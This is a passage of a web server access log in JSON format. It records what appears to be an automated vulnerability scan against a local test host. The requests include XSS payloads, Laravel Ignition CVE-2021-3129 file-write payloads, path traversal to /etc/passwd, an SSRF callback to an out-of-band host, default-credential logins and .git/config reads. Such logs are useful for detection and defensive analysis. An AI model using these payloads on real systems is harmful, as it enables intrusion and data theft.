AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\x0D\x0A\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sap/public/bc/ur/Login/assets/corbu/sap_logo.png HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.048","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /xprober.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.045","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin-ajax.php?action=cb_s_a&cbi=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.200","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /i.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.045","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:18 +0000","request_body":"{\x22solution\x22: \x22Facade\x5C\x5CIgnition\x5C\x5CSolutions\x5C\x5CMakeViewVariableOptionalSolution\x22, \x22parameters\x22: {\x22variableName\x22: \x22cve20213129\x22, \x22viewFile\x22: \x22php://filter/write=convert.quoted-printable-decode|convert.iconv.utf-16le.utf-8|convert.base64-decode/resource=../storage/logs/laravel.log\x22}}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /_ignition/execute-solution HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.052","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/70 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.201","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /user.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.047","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.045","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.git/config HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /zdm/login_xdm_uc.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.053","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:18 +0000","request_body":"{\x22solution\x22: \x22Facade\x5C\x5CIgnition\x5C\x5CSolutions\x5C\x5CMakeViewVariableOptionalSolution\x22, \x22parameters\x22: {\x22variableName\x22: \x22cve20213129\x22, \x22viewFile\x22: \x22phar://../storage/logs/laravel.log/test.txt\x22}}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /_ignition/execute-solution HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.045","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/71 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.043","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /graph HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.221","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.user.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.054","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/email-subscribers HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.056","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /apis/apps/v1/namespaces/default/deployments HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.210","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/72 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.041","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /karma.js HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.188","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /forums/search/z--%3E%22%3E%3C/script%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3E/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.051","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?297MbCqR43PImseESNarRLzZcpC=9 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"cache.example.com"} +{"@timestamp": "13/May/2022:16:36:18 +0000","request_body":"{\x22query\x22:\x22query {\x5Cn __schema {\x5Cn directive\x5Cn }\x5Cn}\x22,\x22variables\x22:null}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /graphql HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /zenphoto/zp-core/setup/index.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/73 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /getFavicon?host=http://c9v8hs0smpv8c6ag07h0a4nnw5a4nyy1k.oast.online HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?return_url=javascript:alert(document.domain) HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:19 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v1/subscriptions HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.192","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /hmc/hybris HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?297MbCqR43PImseESNarRLzZcpC=9 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:19 +0000","request_body":"username=admin&password=admin","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /carbon/admin/login_action.jsp HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.190","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /zp/zp-core/setup/index.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/74 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /XMII/Catalog?Mode=GetFileList&Path=Classes/../../../../../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.038","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:19 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v2 HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /hybris/hmc/hybris HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /users/sign_in HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /libs/dam/merge/metadata.html?path=/etc&.ico HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /gallery/zp-core/setup/index.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/75 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:19 